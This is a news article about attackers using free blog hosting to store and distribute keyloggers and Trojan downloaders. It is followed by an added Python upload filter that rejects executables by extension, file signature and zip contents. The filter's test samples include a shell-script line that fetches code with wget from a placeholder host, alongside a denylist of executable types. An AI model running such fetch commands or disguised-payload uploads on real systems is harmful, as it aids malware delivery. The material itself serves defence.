Hackers Use Blogs To Spread Worms, Keyloggers

Blogs aren't just for blabbing to friends and family, said a security and content filtering firm Wednesday, but increasingly are being used as a safe haven by hackers for storing and distributing malicious code, including identity-stealing keyloggers.

"We're seeing that more and more of the locations where malicious code is stored is on blog sites," said Dan Hubbard, the senior director of security and technology research for San Diego-based Websense. So far this year, Hubbard said, his lab has discovered hundreds of blogs involved in the storage and delivery of harmful code.

"In particular, keyloggers and other Trojan downloaders and droppers are being stored and updated from blog sites," Hubbard added. A keylogger is spyware that silently records what a user types on an infected PC, such as user names, passwords and account numbers, and transmits the captured data to the attacker.

Malware and spyware writers are turning to blogs, and away from traditional hosting and e-mail services, because blog hosts offer large amounts of free storage, require no identity verification to register or post, and in most cases don't scan posted files for viruses, worms, or spyware.

"It's partly the storage, partly the ease of use [of blogs], and partly a stability issue. Hacked machines, for instance, can easily go down if the actual owner discovers his computer's being used, but the blogs are always there," said Hubbard.

Different hackers use blogs in different ways. Some create a blog on a legitimate service, post virus or keylogger code to the page, and lure users there with spam or spim (instant-message spam); visitors are infected on arrival. Others use the blog purely as storage: Trojan horses already planted on victims' PCs fetch files from it to update themselves or to install a keylogger on the infected machine.

"In those cases, victims don't even see the blog or the blog site," said Hubbard. "Hackers are using the storage space on the blog site because, unlike personal storage and mail hosting facilities, most blogs aren't running anti-virus software on posted files."

Using a blog as the hosting point further disguises the true identity of the hacker, since the files sit on a third party's infrastructure under a throwaway account, and it adds another hop to the already convoluted path attackers use to disseminate their code.

In late March, for instance, Websense issued an alert that outlined how a spoofed e-mail tried to redirect recipients to a blog which in turn hosted a Trojan horse designed to steal online banking passwords.

"The blogs are being used as the first step of a multi-layered attack that could also involve a spoofed e-mail, Trojan horse, or a keylogger," explained Hubbard.

While end users can do little beyond following safe practices (don't open unexpected attachments, don't follow questionable links in e-mail or instant messages), Hubbard said there was plenty blog hosting services could do.

"They need to add some type of security on top," he urged. "Anti-virus is a good start. And limit the type of files that can be uploaded, by, for example, restricting executables."
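The second of Hubbard's suggestions, restricting executables, is only effective if the host inspects what was actually uploaded rather than trusting the filename: a dropper that fetches "stage2.jpg" does not care that the bytes inside are a Windows executable. The following is an added example, not Websense's code or any blog platform's own upload handling. It shows a content-based upload gate: an extension denylist as a first pass, then signature checks on the bytes themselves (PE, ELF, Mach-O, interpreter scripts), a look inside zip archives for executable members, and a check that files claiming to be images carry a real image header. The policy tables (`BLOCKED_EXTENSIONS`, `IMAGE_MAGIC`) and the sample files are constructed for the example; anti-virus scanning, Hubbard's first suggestion, would be a separate layer on top of this and is not substituted here.

```python
import io
import os
import zipfile

# Constructed policy for the example: extensions a blog host would refuse outright.
BLOCKED_EXTENSIONS = {
    ".exe", ".dll", ".scr", ".pif", ".com", ".cpl", ".msi",
    ".bat", ".cmd", ".vbs", ".js", ".hta", ".ps1", ".jar",
}

# File signatures (magic numbers) of native executables and scripts. These are
# checked on the content regardless of what the filename claims.
EXECUTABLE_MAGIC = [
    (b"MZ", "Windows PE executable"),
    (b"\x7fELF", "ELF executable"),
    (b"\xfe\xed\xfa\xce", "Mach-O executable"),
    (b"\xfe\xed\xfa\xcf", "Mach-O 64-bit executable"),
    (b"\xce\xfa\xed\xfe", "Mach-O executable (little-endian)"),
    (b"\xcf\xfa\xed\xfe", "Mach-O 64-bit executable (little-endian)"),
    (b"\xca\xfe\xba\xbe", "Mach-O universal binary or Java class file"),
    (b"#!", "script with interpreter line"),  # policy choice: no shebang files at all
]

# Constructed allowlist: image types the host accepts, with the headers they must carry.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

ZIP_MAGIC = b"PK\x03\x04"


def executable_type(data):
    """Return a description if the bytes start with a known executable signature, else None."""
    for magic, description in EXECUTABLE_MAGIC:
        if data.startswith(magic):
            return description
    return None


def check_upload(filename, data):
    """Decide whether an uploaded file may be stored.

    Returns (allowed, reason). The filename is the client's claim; the bytes are
    the evidence, so the content checks run even when the extension looks harmless.
    """
    ext = os.path.splitext(filename)[1].lower()

    if ext in BLOCKED_EXTENSIONS:
        return False, "blocked extension %s" % ext

    kind = executable_type(data)
    if kind:
        return False, "content is a %s despite name %r" % (kind, filename)

    if data.startswith(ZIP_MAGIC):
        # Archives are a common wrapper for a renamed payload; inspect each member's
        # name and the first bytes of its content. Only 8 bytes are read per member,
        # so a deliberately huge archive cannot exhaust memory here.
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                for member in archive.infolist():
                    member_ext = os.path.splitext(member.filename)[1].lower()
                    head = archive.open(member).read(8)
                    if member_ext in BLOCKED_EXTENSIONS or executable_type(head):
                        return False, "archive contains executable %r" % member.filename
        except zipfile.BadZipFile:
            return False, "malformed zip archive"

    if ext in IMAGE_MAGIC:
        if not any(data.startswith(sig) for sig in IMAGE_MAGIC[ext]):
            return False, "%s extension but no matching image header" % ext

    return True, "ok"


def build_sample_zip():
    """Constructed sample: an archive carrying a PE file renamed to look like data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("readme.txt", "nothing to see")
        archive.writestr("stage2.dat", b"MZ\x90\x00" + b"\x00" * 60)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed uploads: a real JPEG header, a PE renamed to .jpg, a shell script
    # named .txt, and an archive hiding a renamed PE.
    samples = [
        ("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
        ("holiday.jpg", b"MZ\x90\x00" + b"\x00" * 16),
        ("notes.txt", b"#!/bin/sh\nwget http://example.invalid/x\n"),
        ("theme.zip", build_sample_zip()),
    ]
    for name, blob in samples:
        print(name, check_upload(name, blob))
```

The point of the ordering is that the extension denylist is cheap but bypassable, so it never short-circuits the content checks: the renamed PE in `holiday.jpg` is rejected by its `MZ` header, and the payload inside `theme.zip` is rejected by the archive walk. The image-header check closes the remaining gap where an attacker uploads an executable disguised under an allowed image extension with a non-standard header; anything that is neither a recognised image nor a clean archive is still subject to whatever anti-virus layer the host adds.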